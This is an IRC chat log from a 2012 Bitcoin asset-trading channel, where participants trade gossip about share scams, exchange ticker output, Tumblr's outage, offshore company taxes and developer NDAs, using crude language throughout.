12 23:38:57 That's such b-s. Nobody in their right fucking mind would pay for just one bfl single mining in perpetuity at $2500 per. Dec 12 23:39:37 nobody in his right mind is on glbse. Dec 12 23:39:40 I thought an FPGA Single was $599... Dec 12 23:39:42 or was, for that matter. Dec 12 23:39:50 And msg #4 in that thread doesn't say anything about how the current shareholders won't see any profit from a second bfl unit. Dec 12 23:39:54 B0g4r7 something like that. Dec 12 23:40:10 theymos already said I wont get a Scammer Tag so Jeuk suck my ballz Dec 12 23:40:37 maybe he's bad at math. Dec 12 23:41:06 http://nymag.com/news/features/70985/ re money in porn. Dec 12 23:41:35 It's just as misleading as goat was with his "hashrate" b-s which was really just an odds-less bet against difficulty going up. Dec 12 23:41:44 [MPEX] [S.MPOE] 4321 @ 0.00056651 = 2.4479 BTC [+] Dec 12 23:41:45 [MPEX] [S.MPOE] 1188 @ 0.00056626 = 0.6727 BTC [-] Dec 12 23:41:47 [MPEX] [S.MPOE] 21154 @ 0.00056625 = 11.9785 BTC [-] Dec 12 23:41:48 [MPEX] [S.MPOE] 305 @ 0.00056421 = 0.1721 BTC [-] Dec 12 23:41:49 [MPEX] [S.MPOE] 4103 @ 0.00056309 = 2.3104 BTC [-] Dec 12 23:41:49 [MPEX] [S.MPOE] 4085 @ 0.00056303 = 2.3 BTC [-] Dec 12 23:41:50 [MPEX] [S.MPOE] 7974 @ 0.00056292 = 4.4887 BTC [-] Dec 12 23:41:52 [MPEX] [S.MPOE] 8783 @ 0.00056112 = 4.9283 BTC [-] Dec 12 23:42:31 [MPEX] [S.MPOE] 4321 @ 0.00056341 = 2.4345 BTC [+] Dec 12 23:42:32 [MPEX] [S.MPOE] 4321 @ 0.0005631 = 2.4332 BTC [-] Dec 12 23:42:34 [MPEX] [S.MPOE] 11286 @ 0.00056112 = 6.3328 BTC [-] Dec 12 23:42:35 [MPEX] [S.MPOE] 6872 @ 0.00056027 = 3.8502 BTC [-] Dec 12 23:42:58 mircea_popescu: Ooo that's some good writing. I like it when they're poetic. Dec 12 23:43:46 I doubt any former glbse assets have "succeeded" Dec 12 23:44:16 [MPEX] [X.ACOG] 650 @ 0.05713408 = 37.1372 BTC [+] Dec 12 23:44:21 As in produced a positive ROI for shareholders. Dec 12 23:44:24 midnightmagic it's funny cause it's pot calling kettle black Dec 12 23:44:32 as if writers are in any better shape than whores. Dec 12 23:44:39 B0g4r7 exactly one has. Dec 12 23:44:50 smickles' mpoe.etf posted 1200% gains. Dec 12 23:44:52 lol, which? Dec 12 23:44:56 mm Dec 12 23:45:01 That's quite a gain. Dec 12 23:45:03 lol Dec 12 23:45:07 over ~6 months Dec 12 23:45:13 Is that since listing? Dec 12 23:45:13 it works out to about the same as pirate Dec 12 23:45:18 6.8% a week or something Dec 12 23:45:21 What's smickles doing? Dec 12 23:45:30 yeah over lifetime, was listed i think april dissolved early oct. Dec 12 23:45:40 midnightmagic brokering mostly. Dec 12 23:45:50 brokering what? other shares? Dec 12 23:46:12 well ya Dec 12 23:46:37 I gotta talk to you more often I think.. Dec 12 23:46:45 ;;calc 1.068 ** 28 Dec 12 23:46:45 6.30950189886 Dec 12 23:46:50 heh Dec 12 23:47:44 [MPEX] [X.ASBG] 400 @ 0.11396016 = 45.5841 BTC Dec 12 23:51:25 smickles is the man Dec 12 23:51:43 my glbse haircut wasn't entirely as bad as i expected Dec 12 23:52:05 wtf man, still shaking my head at psychoboy.. I wonder if he has an -otc profile. Dec 12 23:53:10 http://bitcoin-otc.com/viewratingdetail.php?nick=PsychoticBoy&sign=ANY&type=RECV Dec 12 23:53:34 lol mostly usagi Dec 12 23:53:56 ElevatedDownfall Dec 12 23:54:17 borrows bitcoins Dec 12 23:54:54 16913 Kelticfox 19 ElevatedDownfall 2012-12-08 12:20:17 8 Pleasure doing business again... and again... and again... and again... and again... and again... and again... and again. Dec 12 23:55:01 something tells me each again = 1..5 btc. Dec 12 23:55:27 ;;rate ElevatedDownfall 3 has repaid [calc 6.3/7] of his BTC loan so far Dec 12 23:55:28 Rating entry successful. Your rating for user ElevatedDownfall has changed from 2 to 3. Dec 12 23:55:39 ;;rated ElevatedDownfall Dec 12 23:55:40 You rated user ElevatedDownfall on Wed Dec 12 13:55:29 2012, giving him a rating of 3, and supplied these additional notes: has repaid 0.9 of his BTC loan so far. Dec 12 23:56:22 you forgot the % Dec 12 23:56:27 mircea_popescu All the transactions are in the blockchain and look legit. None of the "UNKNOWN" status ones. Everything confirmed. Dec 12 23:56:34 whoa ?! Dec 12 23:56:44 nice, moar dividends. Dec 12 23:57:14 ;;rate ElevatedDownfall 3 has repaid 6.3BTC of a 7BTC loan so far. No interest yet, either :( Dec 12 23:57:18 Rating entry successful. Your rating for user ElevatedDownfall has changed from 3 to 3. Dec 12 23:57:29 Some are listed as OVER MAX, when there were double 250BTC bets on the same address on the same magic number, but some of those were winners and some losers and I don't think they are counted Dec 12 23:57:31 how the fuck is that 3 Dec 12 23:57:40 it's his third loan Dec 12 23:57:45 i'm being nice Dec 12 23:57:48 jcpham whats "2x mad ninja loan repaymentation" ? Dec 12 23:58:03 that was repayment on the second loan Dec 12 23:58:11 specifically the ninja loan term Dec 12 23:58:21 caffeine? Dec 12 23:58:25 too much of it Dec 12 23:58:33 So, S.DICE would pay out 14,500 BTC, 4.3% dividend this month, IF the month ended now. Dec 12 23:58:35 < midnightmagic> What's smickles doing? << launching a bitcoin focused accounting company Dec 12 23:58:46 sounds pretty sweet Buglouse Dec 12 23:58:50 oops i mean Bugpowder Dec 13 00:00:16 [MPEX] [X.MGCG] 39 @ 0.12999995 = 5.07 BTC [-] Dec 13 00:00:25 Who would have thought all the futures action would be in soybeans and corn? Dec 13 00:00:38 mircea_popescu: did you get that 'later tell' i sent you? Dec 13 00:01:12 yeah and i answered! Dec 13 00:01:32 oh, i need to notice things it seems Dec 13 00:01:42 or i did't get a hilight near it :| Dec 13 00:01:55 oh sweet, someone is buying my gold futures. I cut my prices on gold, nasdaq and crude. The 2% insurance fee is going to hurt a bit though. Dec 13 00:02:32 anyway : neither mpoe nor myself are mm'ing the new futures Dec 13 00:02:47 ah, thanks for the re-answer Dec 13 00:02:52 i guess bugpowder is lol Dec 13 00:03:02 ack! youporn?!? Dec 13 00:03:11 I need to get home to read that article. Dec 13 00:08:23 jezus fuck data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAJoAAAAtCAIAAADZUuWNAAACtElEQVR4nO2b63KEMAiFodP3f2X6Y1dFkkBumkv5ptPR1tXIyYmEuEhE4CwNIhwi/o5tSSkIyHcJ/n1fRPz+JgKAn8GtcVpAFNsu58rwB6W7cwc+ih66upzrwzzqcm6Fy7kVLudWuJxb4XIuCGLqPy7napxloBgu51IEZSDB7DVbUaT97xBdKsbWTtydq3EvAwlczgVJr2m6nFvhcm7F7KmQzoOr2SJvXOSdDXfnVsznTmmLQc1Ykx3dma6Bbc92cqo1sOTxqV3lU/znabIvUSvny/eTiVUDix9z/qW0KzyH0kiVvdwZvAol4aERIcvpCh1RLqE00mIHOYnfplIDE6ER2utdoe9oFEh1zbj0RlqMl/Mep+ Dec 13 00:08:30 oh Dec 13 00:08:31 bad paste Dec 13 00:08:52 Network: FreeNode Channel: #bitcoin-assets Dec 13 00:08:52 text_hidejoinpart...: OFF Dec 13 00:09:11 did you paste a mpex graph ? Dec 13 00:09:25 -_- yes Dec 13 00:09:31 the mpoe one Dec 13 00:09:32 it worked :D Dec 13 00:11:18 ;;calc 13.3903/[ticker --last] Dec 13 00:11:22 0.984654007393 Dec 13 00:22:04 mircea_popescu: usagi is the guy who did the insurance policy for PsychoticBoy right? CPA or whatever? Dec 13 00:22:51 yeah Dec 13 00:22:57 had all sorts of funny insurance going on Dec 13 00:23:10 And there he is in the scammer thread defending PsychoticBoy. Dec 13 00:23:25 Have these fucktards ever heard of the notion of conflict of interest?! Dec 13 00:23:50 How many knobs are being polished in one big circle-jerk, I wonder, but am not curious enough to bother finding out. Dec 13 00:28:13 midnightmagic in general, if someone is flaming at mpoe-pr it's already a good indication he's part of the cj Dec 13 00:28:24 https://bitcointalk.org/index.php?topic=130343.msg1395366#msg1395366 take this fucktard for instance. Dec 13 00:30:16 um bitfinex is btc/usd only rite? Dec 13 00:31:40 im not even sure Dec 13 00:33:17 who's "killerstorm"? Dec 13 00:33:35 i have no idea. Dec 13 00:34:11 I'm unreasonably irritated at the notion that PsychoticBoy isn't going to get a scammer tag for that. Dec 13 00:34:49 quite unreasonably. Dec 13 00:35:08 there's > 50 people who peeled the glbse muppets of a couple to a few hundred btc. Dec 13 00:37:37 When it's as blatant as PB? Dec 13 00:38:01 Revealed intent after the fact was that he sold $2500 of shares for an item that was $1300. Dec 13 00:38:50 That's fraud right there, because he never clarified. He used weasel words to suggest he was going to use the money to expand. He never actually said, "No, it's just for one single." Dec 13 00:39:03 ya well. Dec 13 00:39:16 All those >50 people need scammer tags too if they're that blatant about it. Dec 13 00:39:18 usagi doesn't have a tag either. Dec 13 00:39:23 He's not even defending the business plan. Dec 13 00:39:27 in general, if it's not 10k btc + it seems hardly worth the hassle. Dec 13 00:39:41 i don't think the scammer tags work. Dec 13 00:39:44 for your reading pleasure: https://bitcointalk.org/index.php?topic=125629.msg1396057#msg1396057 Dec 13 00:39:45 ;;google mpex rota Dec 13 00:39:46 Introducing the MPEx Rota: ; The MPEx Rota pe Trilema - Un blog de Mircea Popescu.: ; MPEx pe Trilema - Un blog de Mircea Popescu.: Dec 13 00:39:49 you seen that midnightmagic ? Dec 13 00:39:58 Something about the nature of small-time thieves bothers me more than the pirate scam thing does. Dec 13 00:40:17 Rota? I don't think so. Dec 13 00:40:38 Ukto i don't think your arguments carry any water. Dec 13 00:40:49 just because btc is open source game currency does not make it any less game currency. Dec 13 00:43:18 mircea_popescu: "II.2. The Rota supersedes the jurisdiction of any other court, institution, group, organisation, corporation, reigning monarch, city fool etc." :-) Dec 13 00:43:30 omg wtf is tumblr gone from the tubes ?! Dec 13 00:43:56 midnightmagic hardcore btc supremacism :D Dec 13 00:44:10 mircea_popescu: except that the games claims to have no monetary value, wheras his site does not claim bitcoins have no monetary value. Dec 13 00:44:17 *claim Dec 13 00:44:18 besides Dec 13 00:44:33 the biggest issue is just that hes trading actual corporate stock on his 'fake' site Dec 13 00:44:42 and contridicting the whole thing Dec 13 00:47:07 HAH "Even more, he was paying himself for the time that was required to pay himself" Dec 13 00:49:14 .. thinking about it, it would be the quickest way to convince me to exit bitcoin. Dec 13 00:51:36 whaty wouyld the devs matter Dec 13 00:51:46 Ukto nobody has the authority to make such claims in bitcoin. Dec 13 00:54:44 [MPEX] [S.MPOE] 14950 @ 0.00056539 = 8.4526 BTC [+] Dec 13 00:57:16 [MPEX] [S.MPOE] 4700 @ 0.00056539 = 2.6573 BTC [+] Dec 13 00:57:17 which claims? Dec 13 00:57:18 [MPEX] [S.MPOE] 1000 @ 0.00056028 = 0.5603 BTC [-] Dec 13 00:57:18 [MPEX] [S.MPOE] 3671 @ 0.00056027 = 2.0568 BTC [-] Dec 13 00:58:05 that bitocin has no monetary value? Dec 13 00:58:14 youare 100% correct atthat Dec 13 00:58:15 at that. :) Dec 13 00:58:51 that bitcoin HAS a monetary value. Dec 13 00:59:03 Purity of philosophical intent would be compromised. Dec 13 00:59:06 the reason wow makes the claim it doesn't is because by not making it they'd claim the opposite Dec 13 00:59:20 right Dec 13 00:59:50 burnside can not claim BTC has no value (which is being traded for virtually realistic shares of his real corporation) Dec 13 00:59:54 you seen the this http://trilema.com/2012/the-reasons-why-bitcoin-securities-cant-be-regulated-by-the-sec/ ? Dec 13 01:00:06 I agree with you? on all points? Dec 13 01:00:12 okay. well then... Dec 13 01:00:22 which of my comments am I now contridicting? Dec 13 01:00:30 i think that is where my confusion is comming from. :) Dec 13 01:00:31 im not sure that you are Dec 13 01:00:34 LOL Dec 13 01:00:39 i'm just trying to see what you're sasying. Dec 13 01:00:40 alright lets go with that then :P Dec 13 01:00:53 I dont have apoitn sometimes Dec 13 01:00:54 just ramble Dec 13 01:00:58 lolk Dec 13 01:00:58 point* Dec 13 01:01:00 I try to though Dec 13 01:01:18 i think he was trying to justify his sites as the same as wow and secondlife Dec 13 01:01:34 and I was just pointing out they are very different animals Dec 13 01:01:49 “Tubes are going to destroy our industry,” says Sunny Leone, 29, an Indian-American knockout who is celebrating eight nominations this evening. “Fans don’t understand that if they don’t pay for porn, we can’t make a living. They’ll have to watch crazy European porn.” Dec 13 01:01:49 when you compare their behaviours and actions side by side Dec 13 01:01:51 AHAHAHAAaaa Dec 13 01:15:13 ;;google sunny leone pictures Dec 13 01:15:14 Sunny Leone sells her adult pictures - Hindustan Times: ; Sunny Leone photos - Photobucket: ; Sunny Leone Profile - Photos, Wallpapers, Videos, News, Sunny ...: Dec 13 01:16:07 [MPEX] [S.DICE] 1468 @ 0.00336715 = 4.943 BTC [+] Dec 13 01:16:09 [MPEX] [S.DICE] 1852 @ 0.00338189 = 6.2633 BTC [+] Dec 13 01:16:09 [MPEX] [S.DICE] 396680 @ 0.003395 = 1346.7286 BTC [+] Dec 13 01:18:13 [MPEX] [S.MPOE] 4321 @ 0.00057053 = 2.4653 BTC [+] Dec 13 01:18:14 [MPEX] [S.MPOE] 12179 @ 0.00057082 = 6.952 BTC [+] Dec 13 01:21:00 is jurov around? Dec 13 01:24:46 probably, hes not straight. Dec 13 01:31:11 [MPEX] [S.MPOE] 4321 @ 0.0005705 = 2.4651 BTC [-] Dec 13 01:31:13 [MPEX] [S.MPOE] 2974 @ 0.00057082 = 1.6976 BTC [+] Dec 13 01:31:39 Berlin (Germany) - A German man became so frustrated at his computer that he threw it out of his window, and the police reaction was essentially "we understand". Dec 13 01:31:43 http://www.tgdaily.com/business/32940-man-throws-his-computer-out-the-window-police-sympathize Dec 13 01:32:28 [MPEX] [S.MPOE] 4321 @ 0.00057397 = 2.4801 BTC [+] Dec 13 01:32:29 [MPEX] [S.MPOE] 6079 @ 0.00057416 = 3.4903 BTC [+] Dec 13 01:44:46 [MPEX] [O.BTCUSD.P190T] 1000 @ 0.53866353 = 538.6635 BTC [+] Dec 13 01:44:47 [MPEX] [O.BTCUSD.P200T] 1000 @ 0.62061168 = 620.6117 BTC [+] Dec 13 01:45:04 meow https://bitcointalk.org/index.php?topic=130117.20 Dec 13 01:46:25 [MPEX] [S.MPOE] 18300 @ 0.00057416 = 10.5071 BTC [+] Dec 13 01:47:01 [MPEX] [S.MPOE] 1168 @ 0.00057416 = 0.6706 BTC [+] Dec 13 01:47:02 [MPEX] [S.MPOE] 9782 @ 0.00057483 = 5.623 BTC [+] Dec 13 01:47:45 i don't think his legal advice is very good. Dec 13 01:47:59 seems "met someone in a bar" nefario level. Dec 13 01:48:53 he is here i think Dec 13 01:49:05 perhaps he can elaborate Dec 13 01:51:26 [MPEX] [S.MPOE] 4321 @ 0.00057332 = 2.4773 BTC [-] Dec 13 01:51:27 [MPEX] [S.MPOE] 14955 @ 0.00057313 = 8.5712 BTC [-] Dec 13 01:51:29 [MPEX] [S.MPOE] 1623 @ 0.00056471 = 0.9165 BTC [-] Dec 13 01:51:54 there really is insufficient drama Dec 13 01:52:09 i was hoping for the bitmag stuff to bridge us over till the weekend and then maybe bfl stuff Dec 13 01:52:17 but seriously, the first fizzled, the 2nd is like... meh... Dec 13 01:53:26 i just recooked old soup https://bitcointalk.org/index.php?topic=101081.msg1396080#msg1396080 Dec 13 01:53:55 not enough for drama :\ Dec 13 01:54:07 better than mpex eh ? Dec 13 01:54:13 heheheh Dec 13 01:54:21 baiter omg Dec 13 01:54:54 da fuck liquidity med ? Dec 13 01:55:06 what the hell, you telling me bit4x trades 10-100k btc a month nao ?! Dec 13 01:55:52 noone can do a serious dent in the book Dec 13 01:56:13 or any dent Dec 13 01:56:32 o i c what you did there. Dec 13 01:56:46 i guess you have a point eh. Dec 13 01:56:53 :p Dec 13 01:59:55 https://bitcointalk.org/index.php?topic=130422.0 Dec 13 01:59:58 this is pretty food Dec 13 02:00:00 good* Dec 13 02:00:20 :D Dec 13 02:04:27 [MPEX] [S.MPOE] 4300 @ 0.00056651 = 2.436 BTC [+] Dec 13 02:09:26 Ukto http://polimedia.us/dtng/c/res/17830.html Dec 13 02:13:26 nanotube re http://bitcoin.stackexchange.com/questions/3337/what-are-the-safety-guidelines-for-using-the-sign-message-feature/3339#3339 Dec 13 02:13:53 the simplest solution would maybe adding text reading : This not valid past X date, where X is maybe 24 hoursi n the future Dec 13 02:14:24 this way a merchant would be pretty boneheaded to allow it. in conjunction with a "To be used exclusively on Y" it should do the trick. Dec 13 02:14:29 mircea_popescu: ROFLOL Dec 13 02:18:33 nanotube but yes it's why i've never used that method, only ;;eauth Dec 13 02:20:11 mircea_popescu: yea the signed message bit could use some foolproofing. Dec 13 02:20:37 im not even sure why have them when ;;eauth is there Dec 13 02:20:42 but anyway Dec 13 02:21:42 [MPEX] [S.DICE] 2900 @ 0.003395 = 9.8455 BTC [+] Dec 13 02:31:50 [MPEX] [S.MPOE] 13072 @ 0.00056887 = 7.4363 BTC [+] Dec 13 02:31:52 [MPEX] [S.MPOE] 10150 @ 0.00057059 = 5.7915 BTC [+] Dec 13 02:31:53 [MPEX] [S.MPOE] 20050 @ 0.00057219 = 11.4724 BTC [+] Dec 13 02:31:54 [MPEX] [S.MPOE] 11778 @ 0.00057457 = 6.7673 BTC [+] Dec 13 02:32:04 ;;rate Ukto 1 Bitfunder Dec 13 02:32:05 Rating entry successful. Your rating of 1 for user Ukto has been recorded. Dec 13 02:33:04 ;;rate kakobrekla 3 #bitcoin-assets, smpake, bit4x and so forth Dec 13 02:33:06 Rating entry successful. Your rating for user kakobrekla has changed from 2 to 3. Dec 13 02:33:23 awww Dec 13 02:34:44 lol srsly Dec 13 02:34:52 ;;rate znort987 1 he's in the MPEx faq Dec 13 02:34:53 Rating entry successful. Your rating for user znort987 has changed from 1 to 1. Dec 13 02:38:22 much to my surprise kakobrekla is actually older than me Dec 13 02:38:31 [MPEX] [S.MPOE] 21 @ 0.00056651 = 0.0119 BTC [-] Dec 13 02:38:32 [MPEX] [S.MPOE] 3681 @ 0.00056631 = 2.0846 BTC [-] Dec 13 02:38:33 what?! Dec 13 02:38:42 i dont think so. Dec 13 02:38:44 im 2011-07 Dec 13 02:38:47 you're like -05 Dec 13 02:38:48 ah Dec 13 02:38:53 otc. Dec 13 02:38:54 lol Dec 13 02:38:57 yee Dec 13 02:46:06 [MPEX] [S.MPOE] 7842 @ 0.00056903 = 4.4623 BTC [+] Dec 13 02:46:08 [MPEX] [S.MPOE] 4321 @ 0.00057442 = 2.4821 BTC [+] Dec 13 02:46:09 [MPEX] [S.MPOE] 9822 @ 0.00057457 = 5.6434 BTC [+] Dec 13 02:46:10 [MPEX] [S.MPOE] 406 @ 0.00057483 = 0.2334 BTC [+] Dec 13 02:48:12 mircea_popescu: https://bitcointalk.org/index.php?topic=125629.msg1396316#msg1396316 Dec 13 02:48:12 :P Dec 13 02:48:20 [MPEX] [O.BTCUSD.P190T] 1000 @ 0.53843543 = 538.4354 BTC [-] Dec 13 02:48:22 [MPEX] [O.BTCUSD.P200T] 1000 @ 0.62039873 = 620.3987 BTC [-] Dec 13 02:49:13 lol Dec 13 02:49:26 tbh i don't think there's anything wrong with public discussion, leaves a record Dec 13 02:50:19 I just wanted to see if he will end it. :P Dec 13 02:50:49 Would you could you, on a train? would you could you, please refrain? :P Dec 13 02:50:58 haha Dec 13 02:54:32 [MPEX] [O.BTCUSD.P130T] 1000 @ 0.13522323 = 135.2232 BTC [+] Dec 13 02:54:32 [MPEX] [O.BTCUSD.P140T] 1000 @ 0.18543554 = 185.4355 BTC [+] Dec 13 02:54:34 [MPEX] [O.BTCUSD.P150T] 1000 @ 0.24475155 = 244.7516 BTC [-] Dec 13 02:55:35 [MPEX] [S.MPOE] 4321 @ 0.0005746 = 2.4828 BTC [-] Dec 13 02:55:36 [MPEX] [S.MPOE] 3651 @ 0.00057483 = 2.0987 BTC [+] Dec 13 02:57:08 eee 91k Dec 13 02:57:19 curious if this will be a 6 digit month Dec 13 02:59:04 go go go Dec 13 02:59:49 [MPEX] [S.DICE] 3900 @ 0.003395 = 13.2405 BTC [+] Dec 13 03:06:12 burnside: I am still curious why the servers in panama and not the us or belize? Dec 13 03:06:27 esp. when you have your own hosting company Dec 13 03:13:52 hola! Dec 13 03:14:24 eh, belize didn't have any good options Dec 13 03:14:34 ooh NOW you talk Dec 13 03:14:35 :P Dec 13 03:14:52 I've been poking fun at you all day in here. :P Dec 13 03:14:52 panama seemed at the time to have good connectivity and the boxes were cheap Dec 13 03:15:28 I didn't want to expose the hosting company to the risk. Dec 13 03:15:32 ah Dec 13 03:15:40 wouldnt it just be another customer? Dec 13 03:16:03 I could tell 'them' that. Do you think they would belive me? Dec 13 03:16:03 or are you afriad your shareholdings would tie things together too much? Dec 13 03:16:07 yeah Dec 13 03:16:08 hehe Dec 13 03:16:09 good call Dec 13 03:16:24 so you are worried about 'them' :P Dec 13 03:16:32 nah, honestly, I went into this just wanting to code a cool site and sell it. Dec 13 03:16:39 nobody bought, and I had already coded it. Dec 13 03:16:43 now I have to run it. Dec 13 03:16:48 lol Dec 13 03:16:54 noithing like taking on another project you didnt want :P Dec 13 03:17:14 the css updates were nice tho Dec 13 03:17:18 I have to grow it to where someone else thinks it's worth taking over. Dec 13 03:17:33 well, just keep selling your shares at 200l each, and youll get there :P Dec 13 03:17:35 i hope people are aware of that Dec 13 03:17:41 I was surprised how easy css3 makes it... it's been a while since I've done html/css stuff. Dec 13 03:17:55 kakobrekla: whats that? Dec 13 03:18:07 02:17.13 ( burnside ) I have to grow it to where someone else thinks it's worth taking over. Dec 13 03:18:12 that Dec 13 03:18:13 oh Dec 13 03:18:14 I've been clear in many threads across many posts that we're looking for large investors to become involved. Dec 13 03:18:47 investors outside the US that are willing to do the AML share registration and be corporate officers, etc. Dec 13 03:19:18 and Dec 13 03:19:18 02:16.28 ( burnside ) nah, honestly, I went into this just wanting to code a cool site and sell it. Dec 13 03:19:18 that Dec 13 03:19:32 yup, one leads into the other. Dec 13 03:19:44 think for a second about how I get from (A) to (B) Dec 13 03:20:08 (A) get investors, let them do the business pieces. (B) I get to be the programmer and do the part that is fun for me. Dec 13 03:20:31 did you skip A ? Dec 13 03:20:35 and endup at C? Dec 13 03:20:44 I did. :( Dec 13 03:20:45 er D? none of the above. lol Dec 13 03:20:53 I did my part (B), and (A) never showed. Dec 13 03:20:57 lol Dec 13 03:21:19 well, at least you got someone in belize to act as a local director Dec 13 03:21:22 [MPEX] [S.MPOE] 9061 @ 0.00057483 = 5.2085 BTC [+] Dec 13 03:21:24 [MPEX] [S.MPOE] 11418 @ 0.00057489 = 6.5641 BTC [+] Dec 13 03:21:25 I'll keep doing my bit, and hopefully (A) will show. Dec 13 03:21:36 yeah, we have a local director and local nominee shareholder. Dec 13 03:22:29 Although, wont Belize shut the corporation down eventually? Or is it a non profit? Dec 13 03:22:54 I do have to file annual tax returns Dec 13 03:22:59 not sure what the tax rate is. Dec 13 03:23:28 most countries require that a company has to show actual profits (Sometimes of amounts) within X years, or they shut down the corp and deem it as a hobby Dec 13 03:24:00 [MPEX] [O.BTCUSD.C130T] 400 @ 0.18676245 = 74.705 BTC [+] Dec 13 03:24:01 [MPEX] [O.BTCUSD.C120T] 600 @ 0.23601245 = 141.6075 BTC [+] Dec 13 03:24:03 [MPEX] [O.BTCUSD.C110T] 800 @ 0.29397906 = 235.1832 BTC [+] Dec 13 03:24:13 Since the company itself will only be converting enough commodities to cover costs, I'm not super worried about it. Dec 13 03:24:42 We will have to show a profit in 5 years, but that becomes an exercise to tackle in year 4.5. Dec 13 03:24:52 err Dec 13 03:24:54 thats different Dec 13 03:25:01 you said the company does not profit in currency Dec 13 03:25:10 "Further, we are not exchanging virtual goods for real currency. So there is no exposure there either. The company does not profit in currency. " Dec 13 03:25:29 So I was confused by that Dec 13 03:25:56 well, there's right now. there's tomorrow. there's next month. next year. and 4.5 years from now. which do you want? Dec 13 03:26:03 The commodity has a value, the govts generally want you to est. that value when you give it to people Dec 13 03:26:15 like in the US Dec 13 03:26:20 there is bartering value Dec 13 03:26:26 that is true. in the us you're supposed to track the bartering value Dec 13 03:26:32 i think you may have covered in the tax stuff with gigamining you said Dec 13 03:26:41 yeah, discussed it a bit. Dec 13 03:26:42 when you give out a commodity to people Dec 13 03:26:45 it "has" a value Dec 13 03:26:49 and you are supposed to declare Dec 13 03:26:57 that with your businesses taxes, as an expense of sorts Dec 13 03:27:20 you can get that value easily, by taking the amounts held back and converted to currency Dec 13 03:27:29 [MPEX] [S.DICE] 45815 @ 0.003395 = 155.5419 BTC [+] Dec 13 03:27:30 you have to keep in mind that for BTC Trading Co, I have to approach taxes from the perspective of the Belize gov't. Dec 13 03:27:43 For me personally, I have to approach taxes from the US gov't. Dec 13 03:27:57 So yes, I will be reporting any profit on any crypto that I convert to USD. Dec 13 03:28:05 man I just got the shit shot out of me playing paintball Dec 13 03:28:22 including a point blank to the back of the head team kill Dec 13 03:28:33 ;;whois tumblr.com Dec 13 03:28:34 Error: 'tumblr.com' is not a valid nick. Dec 13 03:28:40 srsly, tumblr.com lost its dns ? Dec 13 03:29:10 tumblr.com has no A record Dec 13 03:29:14 wtf ? Dec 13 03:29:20 it happened like 3 hours ago Dec 13 03:29:22 not one fuck given Dec 13 03:29:32 lol Dec 13 03:29:49 http://news.cnet.com/8301-1023_3-57558871-93/tumblr-goes-dark-with-massive-outage/ Dec 13 03:30:00 its just the a records too, ns/mx is fine Dec 13 03:30:10 which means pebcak Dec 13 03:30:31 and should take ~7 seconds to fix Dec 13 03:30:56 they took it down Dec 13 03:31:04 cause they prolly suck and gnaa Dec 13 03:31:28 they suck and gay nigger assoc of america? Dec 13 03:31:58 yea Dec 13 03:33:03 "when i use my picture viewer i can click through some pictures then my mouse turns into that little loading circle thing and wont go away and it gets like a grey tint over the picture. If i try using the task manager i try to end the program but it dosent go away and the x wont work either? and when i was using itunes i was playing a song and then i tried switching to another one and it started making a loud noise tha Dec 13 03:33:03 t did not sound good and i couldnt shut down my computer at that point like the power button wouldnt even work and i had to take the battery out." this just for dub. Dec 13 03:33:17 think im growing another knee where I got hit at close range on the knee Dec 13 03:33:34 a purple and black version Dec 13 03:34:26 mircea_popescu: wat? Dec 13 03:34:45 pbkac Dec 13 03:36:03 i once worked internet helpdesk dude, you cant teach me about pebkac Dec 13 03:37:55 i never did, but it amuses me to torment people with it Dec 13 03:38:13 so basically btctalk nuked all bfl threads ? Dec 13 03:38:14 nice. Dec 13 03:38:25 s/btctalk/diablo Dec 13 03:38:48 funnily I see more retardation in the engineering and security space than residential internet users Dec 13 03:38:53 eh i dont thin khe gets to delete topicx Dec 13 03:39:31 [13:53] I cleaned out all the bfl crap from the custom hardware forum Dec 13 03:39:35 13:53] bfl can have one thread and thats it Dec 13 03:40:12 eh Dec 13 03:40:27 iirc there were a bunch in economy too Dec 13 03:40:36 LOL Dec 13 03:41:19 lol midnightmagic is active https://bitcointalk.org/index.php?topic=129941.msg1396040#msg1396040 Dec 13 03:41:23 makomk malaimo markedathome maximian midnightmagic MiningBuddy mircea_popescu mod6 MrTiggr Dec 13 03:41:33 a midnightmagic - usagi pit fight, i could watch that. Dec 13 03:42:05 did he answer me? Dec 13 03:42:21 sort-of Dec 13 03:42:43 If he provided the insurance, he has no business commenting in there and vouching for Douchebag McDoucherson. Dec 13 03:43:20 "All you mining hashrate-based companies were betting against your customers" Dec 13 03:43:37 not only is this correct, but let's not forget the scam was actually initiated, proof-of-concepted and prototyped by that asshole meni rosenfeld Dec 13 03:43:39 Also, usagi would be crushed like an insect, were I a warlike individual. I am not, and so what would happen is, the crowd would yell "Fight" and I'd offer usagi some coffee and sit down for a game of cribbage. Dec 13 03:43:47 who is possibly the brain behind half btc scams to date. Dec 13 03:44:00 Really? Dec 13 03:44:03 yes really. Dec 13 03:44:17 this is back early this year. Dec 13 03:44:23 I meant that as a querulous-but-interested question-mark. Dec 13 03:44:37 Did that person post a concept somewhere? Dec 13 03:44:45 lemme see here Dec 13 03:45:03 Yeah, definitely should talk to you more.. Dec 13 03:45:09 lol Dec 13 03:45:29 https://bitcointalk.org/index.php?topic=65569.0 Dec 13 03:45:52 this is the first coming in the open Dec 13 03:46:08 then hk did something, then giga did his in april, then a bunch of smaller guys Dec 13 03:46:14 jwu42 etc Dec 13 03:46:32 including psychoticboy, ciuciu and the rest of the follower crowd Dec 13 03:46:36 anyone with an idea of costs to putting a dev or two under nda? Dec 13 03:47:07 I assume its fairly boilerplate stuff with a few lawyer hours required Dec 13 03:47:39 cost as for the nda drafting or as to the dev signing ? Dec 13 03:48:05 shouldnt be any cost to making the dev sign? Dec 13 03:48:12 [MPEX] [S.MPOE] 22800 @ 0.00057335 = 13.0724 BTC [-] Dec 13 03:48:34 ahahahaa Dec 13 03:48:36 are you new ? Dec 13 03:48:36 job is under nda, take or leave mr dev Dec 13 03:48:41 yes, clearly Dec 13 03:48:47 hence the question Dec 13 03:48:52 most devs that are any good won't sign a nda period. Dec 13 03:48:59 yup Dec 13 03:49:00 I don't get paid more when I sign NDAs Dec 13 03:49:03 if they do you can probably expect a significant paycheck increase. Dec 13 03:49:11 yes well, you're not a dev Dec 13 03:49:23 problem with being a dev is that previous ndas tend to fuck you over when you start new projects Dec 13 03:49:26 well, I kinda am Dec 13 03:49:32 in the case old employer wants to fuck over a start-up, he can Dec 13 03:50:08 it sorta comes with teh whole design engineer PD Dec 13 03:50:23 well what can i tell you. Dec 13 03:50:40 Well, here's the thing. If the price is competitive, then ROI is possible. Dec 13 03:50:48 the trick to making one acceptable is drafting it VERY narrowly Dec 13 03:50:55 which is why you may need a decent lawyer and some time. Dec 13 03:50:56 im not asking how much I have to 